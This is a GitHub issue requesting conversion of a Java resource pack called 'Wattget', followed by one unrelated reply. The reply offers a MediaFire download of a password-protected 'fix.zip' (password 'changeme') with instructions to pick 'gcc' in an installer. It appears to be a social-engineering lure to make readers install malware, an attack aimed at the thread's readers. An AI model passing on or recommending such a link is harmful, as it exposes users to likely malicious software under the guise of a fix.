### ISSUE TITLE
[Pack]: Wattget

### ISSUE THREAD

**Issue by TrongChanTV** [Kas-tle/java2bedrock.sh#33314]
### Java Pack Direct Download URL

https://www.dropbox.com/scl/fi/5uhuhdlihg45adga9qkdn/toolsreimaginedjava-1.zip?rlkey=zfgq9tphgwryr5ncaxneem7mi&st=hzgy2b8m&dl=0

### Default Assets Version

None

### Block Material

None

### Attachable Material

None

### Archive Scratch Files

None

### Rename Model Files

None

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct. I have permission to use all assets I have linked to within this form.

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
